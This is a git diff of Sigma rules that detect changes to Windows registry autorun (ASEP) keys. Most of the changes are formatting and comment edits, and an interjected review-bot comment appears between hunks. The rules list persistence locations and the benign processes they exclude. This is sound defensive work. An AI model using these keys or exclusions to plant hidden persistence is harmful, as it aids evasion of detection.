@@ -47,15 +46,15 @@ detection:
 filter_empty:
 NewValue: (Empty)
 filter_msoffice:
- - ObjectName|contains:
- - \Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\PROTOCOLS\Handler\
- - \ClickToRunStore\HKMU\SOFTWARE\Classes\PROTOCOLS\Handler\
- - NewValue:
- - '{314111c7-a502-11d2-bbca-00c04f8ec294}'
- - '{3459B272-CC19-4448-86C9-DDC3B4B2FAD3}'
- - '{42089D2D-912D-4018-9087-2B87803E93FB}'
- - '{5504BE45-A83B-4808-900A-3A5C36E7F77A}'
- - '{807583E5-5146-11D5-A672-00B0D022E945}'
+ - ObjectName|contains:
+ - \Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\PROTOCOLS\Handler\
+ - \ClickToRunStore\HKMU\SOFTWARE\Classes\PROTOCOLS\Handler\
+ - NewValue:
+ - '{314111c7-a502-11d2-bbca-00c04f8ec294}'
+ - '{3459B272-CC19-4448-86C9-DDC3B4B2FAD3}'
+ - '{42089D2D-912D-4018-9087-2B87803E93FB}'
+ - '{5504BE45-A83B-4808-900A-3A5C36E7F77A}'
+ - '{807583E5-5146-11D5-A672-00B0D022E945}'
 filter_chrome:
 ObjectName|contains: \SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}
 filter_edge:
@@ -73,8 +72,7 @@ detection:
 ProcessName|endswith: \OfficeClickToRun.exe
 condition: registry_set and (main_selection and not 1 of filter_*)
 falsepositives:
- - Legitimate software automatically (mostly, during installation) sets up autorun
- keys for legitimate reason
+ - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
 - Legitimate administrator sets up autorun keys for legitimate reason
 level: medium
 ruletype: Sigma
diff --git a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml
index fbe8af98f..c4d4d548c 100644
--- a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml
@@ -1,16 +1,15 @@
 title: CurrentControlSet Autorun Keys Modification
 id: f674e36a-4b91-431e-8aef-f8a96c2aca35
 related:
- - id: 17f878b8-9968-4578-b814-c4217fc5768c
- type: obsoletes
+ - id: 17f878b8-9968-4578-b814-c4217fc5768c
+ type: obsoletes
 status: experimental
 description: Detects modification of autostart extensibility point (ASEP) in registry.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md
 - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
- - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d
-author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin,
- oscd.community, Tim Shelton, frack113 (split)
+ - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys
+author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
 date: 2019/10/25
 modified: 2023/08/17
 tags:
@@ -48,7 +47,7 @@ detection:
 filter_onenote:
 ProcessName: C:\Windows\System32\spoolsv.exe
 ObjectName|contains: Print\Monitors\Appmon\Ports\Microsoft.Office.OneNote_
- SubjectUserName|contains:
+ SubjectUserName|contains: # covers many language settings
 - AUTHORI
 - AUTORI
 filter_poqexec:
@@ -65,8 +64,7 @@ fields:
 - OldValueType
 - NewValueType
 falsepositives:
- - Legitimate software automatically (mostly, during installation) sets up autorun
- keys for legitimate reason
+ - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
 - Legitimate administrator sets up autorun keys for legitimate reason
 level: medium
 ruletype: Sigma
diff --git a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml
index c89586140..991fd1d0a 100644
--- a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml
@@ -1,17 +1,16 @@
 title: CurrentVersion Autorun Keys Modification
 id: 20f0ee37-5942-4e45-b7d5-c5b5db9df5cd
 related:
- - id: 17f878b8-9968-4578-b814-c4217fc5768c
- type: obsoletes
+ - id: 17f878b8-9968-4578-b814-c4217fc5768c
+ type: obsoletes
 status: experimental
 description: Detects modification of autostart extensibility point (ASEP) in registry.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md
 - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
- - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d
+ - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys
 - https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/
-author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin,
- oscd.community, Tim Shelton, frack113 (split)
+author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
 date: 2019/10/25
 modified: 2023/08/17
 tags:
@@ -49,21 +48,21 @@ detection:
 - \Authentication\Credential Providers
 - \Authentication\Credential Provider Filters
 filter_all:
- - NewValue: (Empty)
- - ObjectName|endswith: \NgcFirst\ConsecutiveSwitchCount
- - ProcessName|endswith:
- - \AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe
- - \AppData\Roaming\Spotify\Spotify.exe
- - \AppData\Local\WebEx\WebexHost.exe
- - ProcessName:
- - C:\WINDOWS\system32\devicecensus.exe
- - C:\Windows\system32\winsat.exe
- - C:\Program Files\Microsoft OneDrive\StandaloneUpdater\OneDriveSetup.exe
- - C:\Program Files\Microsoft OneDrive\Update\OneDriveSetup.exe
- - C:\Program Files (x86)\Microsoft OneDrive\Update\OneDriveSetup.exe
- - C:\Program Files\KeePass Password Safe 2\ShInstUtil.exe
- - C:\Program Files\Everything\Everything.exe
- - C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe
+ - NewValue: (Empty)
+ - ObjectName|endswith: \NgcFirst\ConsecutiveSwitchCount
+ - ProcessName|endswith:
+ - \AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe # C:\Users\*\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe
+ - \AppData\Roaming\Spotify\Spotify.exe
+ - \AppData\Local\WebEx\WebexHost.exe
+ - ProcessName:
+ - C:\WINDOWS\system32\devicecensus.exe
+ - C:\Windows\system32\winsat.exe
+ - C:\Program Files\Microsoft OneDrive\StandaloneUpdater\OneDriveSetup.exe
+ - C:\Program Files\Microsoft OneDrive\Update\OneDriveSetup.exe
+ - C:\Program Files (x86)\Microsoft OneDrive\Update\OneDriveSetup.exe
+ - C:\Program Files\KeePass Password Safe 2\ShInstUtil.exe
+ - C:\Program Files\Everything\Everything.exe
+ - C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe
 filter_logonui:
 ProcessName: C:\Windows\system32\LogonUI.exe
 ObjectName|contains:
@@ -81,8 +80,7 @@ detection:
 ObjectName|contains: DropboxExt
 NewValue|endswith: A251-47B7-93E1-CDD82E34AF8B}
 filter_opera:
- ObjectName|endswith: \SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Opera
- Browser Assistant
+ ObjectName|endswith: \SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Opera Browser Assistant
 NewValue: C:\Program Files\Opera\assistant\browser_assistant.exe
 filter_itunes:
 ObjectName|endswith: \SOFTWARE\Microsoft\Windows\CurrentVersion\Run\iTunesHelper
@@ -145,8 +143,7 @@ detection:
 NewValue|endswith: \Everything\Everything.exe" -startup
 condition: registry_set and (all of current_version_* and not 1 of filter_*)
 falsepositives:
- - Legitimate software automatically (mostly, during installation) sets up autorun
- keys for legitimate reason
+ - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
 - Legitimate administrator sets up autorun keys for legitimate reason
 level: medium
 ruletype: Sigma
diff --git a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml
index c4e676ac9..a5d89007f 100644
--- a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml
@@ -1,16 +1,15 @@
 title: CurrentVersion NT Autorun Keys Modification
 id: cbf93e5d-ca6c-4722-8bea-e9119007c248
 related:
- - id: 17f878b8-9968-4578-b814-c4217fc5768c
- type: obsoletes
+ - id: 17f878b8-9968-4578-b814-c4217fc5768c
+ type: obsoletes
 status: experimental
 description: Detects modification of autostart extensibility point (ASEP) in registry.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md
 - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
- - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d
-author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin,
- oscd.community, Tim Shelton, frack113 (split)
+ - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys
+author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
 date: 2019/10/25
 modified: 2023/08/17
 tags:
@@ -43,7 +42,7 @@ detection:
 - \Windows\Load
 filter_empty:
 NewValue: (Empty)
- filter_legitimate_subkey:
+ filter_legitimate_subkey: # Legitimately used subkeys of \Image File Execution Options, which are not used for persistence (see https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/)
 ObjectName|contains: \Image File Execution Options\
 ObjectName|endswith:
 - \DisableExceptionChainValidation
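Review bot: The comment appended to `filter_legitimate_subkey:` in the second hunk puts a full sentence plus a URL on the key line, which is far longer than any other line in these rules and unlike the short trailing comments used elsewhere in the commit. A comment line above the key, `# Legitimately used subkeys of \Image File Execution Options that are not used for persistence`, with the pentestlab URL moved under `references:`, would keep the rationale readable and make the source discoverable through the rule metadata. The filter's remaining values and the condition that uses it lie outside this hunk.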
@@ -52,12 +51,12 @@ detection:
 ProcessName|startswith: C:\Program Files (x86)\Microsoft\Temp\
 ProcessName|endswith: \MicrosoftEdgeUpdate.exe
 filter_msoffice:
- - ObjectName|contains:
- - \ClickToRunStore\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\
- - \ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\
- - ProcessName:
- - C:\Program Files\Microsoft Office\root\integration\integrator.exe
- - C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe
+ - ObjectName|contains:
+ - \ClickToRunStore\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\
+ - \ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\
+ - ProcessName:
+ - C:\Program Files\Microsoft Office\root\integration\integrator.exe
+ - C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe
 filter_officeclicktorun:
 ProcessName|startswith:
 - C:\Program Files\Common Files\Microsoft Shared\ClickToRun\
@@ -76,20 +75,17 @@ detection:
 ProcessName|endswith: \ngen.exe
 filter_onedrive:
 ProcessName|endswith: \AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
- ObjectName|endswith: \Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached
- Update Binary
+ ObjectName|endswith: \Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Update Binary
 NewValue|startswith: C:\Windows\system32\cmd.exe /q /c del /q "C:\Users\
 NewValue|endswith: \AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe"
- condition: registry_set and (nt_current_version_base and nt_current_version and
- not 1 of filter_*)
+ condition: registry_set and (nt_current_version_base and nt_current_version and not 1 of filter_*)
 fields:
 - SecurityID
 - ObjectName
 - OldValueType
 - NewValueType
 falsepositives:
- - Legitimate software automatically (mostly, during installation) sets up autorun
- keys for legitimate reason
+ - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
 - Legitimate administrator sets up autorun keys for legitimate reason
 level: medium
 ruletype: Sigma
diff --git a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml
index 0955981cf..ddf5a88e5 100644
--- a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml
@@ -1,16 +1,15 @@
 title: Internet Explorer Autorun Keys Modification
 id: a80f662f-022f-4429-9b8c-b1a41aaa6688
 related:
- - id: 17f878b8-9968-4578-b814-c4217fc5768c
- type: obsoletes
+ - id: 17f878b8-9968-4578-b814-c4217fc5768c
+ type: obsoletes
 status: test
 description: Detects modification of autostart extensibility point (ASEP) in registry.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md
 - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
- - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d
-author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin,
- oscd.community, Tim Shelton, frack113 (split)
+ - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys
+author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
 date: 2019/10/25
 modified: 2023/08/17
 tags:
@@ -52,8 +51,7 @@ fields:
 - OldValueType
 - NewValueType
 falsepositives:
- - Legitimate software automatically (mostly, during installation) sets up autorun
- keys for legitimate reason
+ - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
 - Legitimate administrator sets up autorun keys for legitimate reason
 level: medium
 ruletype: Sigma
diff --git a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml
index c0a60c7ee..b12a77e15 100644
--- a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml
@@ -1,16 +1,15 @@
 title: Office Autorun Keys Modification
 id: baecf8fb-edbf-429f-9ade-31fc3f22b970
 related:
- - id: 17f878b8-9968-4578-b814-c4217fc5768c
- type: obsoletes
+ - id: 17f878b8-9968-4578-b814-c4217fc5768c
+ type: obsoletes
 status: experimental
 description: Detects modification of autostart extensibility point (ASEP) in registry.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md
 - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
- - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d
-author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin,
- oscd.community, Tim Shelton, frack113 (split)
+ - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys
+author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
 date: 2019/10/25
 modified: 2023/08/17
 tags:
@@ -77,8 +76,7 @@ fields:
 - OldValueType
 - NewValueType
 falsepositives:
- - Legitimate software automatically (mostly, during installation) sets up autorun
- keys for legitimate reason
+ - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
 - Legitimate administrator sets up autorun keys for legitimate reason
 level: medium
 ruletype: Sigma
diff --git a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml
index ea834543f..380f2978f 100644
--- a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml
@@ -1,16 +1,15 @@
 title: Session Manager Autorun Keys Modification
 id: 046218bd-e0d8-4113-a3c3-895a12b2b298
 related:
- - id: 17f878b8-9968-4578-b814-c4217fc5768c
- type: obsoletes
+ - id: 17f878b8-9968-4578-b814-c4217fc5768c
+ type: obsoletes
 status: test
 description: Detects modification of autostart extensibility point (ASEP) in registry.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md
 - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
- - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d
-author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin,
- oscd.community, Tim Shelton, frack113 (split)
+ - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys
+author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
 date: 2019/10/25
 modified: 2023/08/17
 tags:
@@ -36,16 +35,14 @@ detection:
 - \AppCertDlls
 filter:
 NewValue: (Empty)
- condition: registry_set and (session_manager_base and session_manager and not
- filter)
+ condition: registry_set and (session_manager_base and session_manager and not filter)
 fields:
 - SecurityID
 - ObjectName
 - OldValueType
 - NewValueType
 falsepositives:
- - Legitimate software automatically (mostly, during installation) sets up autorun
- keys for legitimate reason
+ - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
 - Legitimate administrator sets up autorun keys for legitimate reason
 level: medium
 ruletype: Sigma
diff --git a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml
index ae6a2ee75..d81d85519 100644
--- a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml
@@ -1,16 +1,15 @@
 title: System Scripts Autorun Keys Modification
 id: e7a2fd40-3ae1-4a85-bf80-15cf624fb1b1
 related:
- - id: 17f878b8-9968-4578-b814-c4217fc5768c
- type: obsoletes
+ - id: 17f878b8-9968-4578-b814-c4217fc5768c
+ type: obsoletes
 status: test
 description: Detects modification of autostart extensibility point (ASEP) in registry.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md
 - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
- - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d
-author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin,
- oscd.community, Tim Shelton, frack113 (split)
+ - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys
+author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
 date: 2019/10/25
 modified: 2023/08/17
 tags:
@@ -40,8 +39,7 @@ fields:
 - OldValueType
 - NewValueType
 falsepositives:
- - Legitimate software automatically (mostly, during installation) sets up autorun
- keys for legitimate reason
+ - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
 - Legitimate administrator sets up autorun keys for legitimate reason
 level: medium
 ruletype: Sigma
diff --git a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml
index 1428fa66d..d927b40d7 100644
--- a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml
@@ -1,16 +1,15 @@
 title: WinSock2 Autorun Keys Modification
 id: d6c2ce7e-afb5-4337-9ca4-4b5254ed0565
 related:
- - id: 17f878b8-9968-4578-b814-c4217fc5768c
- type: derived
+ - id: 17f878b8-9968-4578-b814-c4217fc5768c
+ type: derived
 status: test
 description: Detects modification of autostart extensibility point (ASEP) in registry.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md
 - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
- - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d
-author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin,
- oscd.community, Tim Shelton, frack113 (split)
+ - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys
+author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
 date: 2019/10/25
 modified: 2023/08/17
 tags:
@@ -30,19 +29,17 @@ detection:
 - \Protocol_Catalog9\Catalog_Entries
 - \NameSpace_Catalog5\Catalog_Entries
 filter:
- - NewValue: (Empty)
- - ProcessName: C:\Windows\System32\MsiExec.exe
- - ProcessName: C:\Windows\syswow64\MsiExec.exe
- condition: registry_set and (winsock_parameters_base and winsock_parameters and
- not filter)
+ - NewValue: (Empty)
+ - ProcessName: C:\Windows\System32\MsiExec.exe
+ - ProcessName: C:\Windows\syswow64\MsiExec.exe
+ condition: registry_set and (winsock_parameters_base and winsock_parameters and not filter)
 fields:
 - SecurityID
 - ObjectName
 - OldValueType
 - NewValueType
 falsepositives:
- - Legitimate software automatically (mostly, during installation) sets up autorun
- keys for legitimate reason
+ - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
 - Legitimate administrator sets up autorun keys for legitimate reason
 level: medium
 ruletype: Sigma
diff --git a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml
index b2f4a2826..3f6205347 100644
--- a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml
@@ -1,17 +1,16 @@
 title: Wow6432Node CurrentVersion Autorun Keys Modification
 id: b29aed60-ebd1-442b-9cb5-16a1d0324adb
 related:
- - id: 17f878b8-9968-4578-b814-c4217fc5768c
- type: obsoletes
+ - id: 17f878b8-9968-4578-b814-c4217fc5768c
+ type: obsoletes
 status: experimental
 description: Detects modification of autostart extensibility point (ASEP) in registry.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md
 - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
- - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d
+ - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys
 - https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/
-author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin,
- oscd.community, Tim Shelton, frack113 (split)
+author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
 date: 2019/10/25
 modified: 2023/08/17
 tags:
@@ -54,12 +53,12 @@ detection:
 - C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe
 ObjectName|contains: \Explorer\Browser Helper Objects\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\
 filter_dropbox:
- - NewValue|endswith: -A251-47B7-93E1-CDD82E34AF8B}
- - NewValue: grpconv -o
- - NewValue|contains|all:
- - C:\Program Files
- - \Dropbox\Client\Dropbox.exe
- - ' /systemstartup'
+ - NewValue|endswith: -A251-47B7-93E1-CDD82E34AF8B}
+ - NewValue: grpconv -o
+ - NewValue|contains|all:
+ - C:\Program Files
+ - \Dropbox\Client\Dropbox.exe
+ - ' /systemstartup'
 filter_evernote:
 ObjectName|endswith: \Explorer\Browser Helper Objects\{92EF2EAD-A7CE-4424-B0DB-499CF856608E}\NoExplorer
 filter_dotnet:
@@ -85,25 +84,24 @@ detection:
 - C:\Windows\Temp\
 ProcessName|contains:
 - \winsdksetup.exe
- - \windowsdesktop-runtime-
- - \AspNetCoreSharedFrameworkBundle-
+ - \windowsdesktop-runtime- # C:\WINDOWS\Temp\{751E2E78-46DC-4376-9205-99219CDC34AE}\.be\windowsdesktop-runtime-6.0.12-win-x86.exe
+ - \AspNetCoreSharedFrameworkBundle- # "C:\ProgramData\Package Cache\{b52191c1-a9c0-4b34-9a4e-930c2dd8a540}\AspNetCoreSharedFrameworkBundle-x86.exe" /burn.runonce
 NewValue|endswith: ' /burn.runonce'
 filter_uninstallers:
+ # This image path is linked with different uninstallers when running as admin unfortunately
 ProcessName|startswith: C:\Windows\Installer\MSI
 ObjectName|contains: \Explorer\Browser Helper Objects
 filter_msiexec:
 ProcessName: C:\WINDOWS\system32\msiexec.exe
 ObjectName|contains: \SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\
- condition: registry_set and (all of selection_wow_current_version_* and not 1
- of filter_*)
+ condition: registry_set and (all of selection_wow_current_version_* and not 1 of filter_*)
 fields:
 - SecurityID
 - ObjectName
 - OldValueType
 - NewValueType
 falsepositives:
- - Legitimate software automatically (mostly, during installation) sets up autorun
- keys for legitimate reason
+ - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
 - Legitimate administrator sets up autorun keys for legitimate reason
 level: medium
 ruletype: Sigma
diff --git a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml
index 8c9440dc6..ae42799b3 100644
--- a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml
@@ -1,16 +1,15 @@
 title: Wow6432Node Classes Autorun Keys Modification
 id: 18f2065c-d36c-464a-a748-bcf909acb2e3
 related:
- - id: 17f878b8-9968-4578-b814-c4217fc5768c
- type: obsoletes
+ - id: 17f878b8-9968-4578-b814-c4217fc5768c
+ type: obsoletes
 status: test
 description: Detects modification of autostart extensibility point (ASEP) in registry.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md
 - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
- - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d
-author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin,
- oscd.community, Tim Shelton, frack113 (split)
+ - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys
+author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
 date: 2019/10/25
 modified: 2023/08/17
 tags:
@@ -48,8 +47,7 @@ fields:
 - OldValueType
 - NewValueType
 falsepositives:
- - Legitimate software automatically (mostly, during installation) sets up autorun
- keys for legitimate reason
+ - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
 - Legitimate administrator sets up autorun keys for legitimate reason
 level: medium
 ruletype: Sigma
diff --git a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml
index 9f56b97bb..bc15836c0 100644
--- a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml
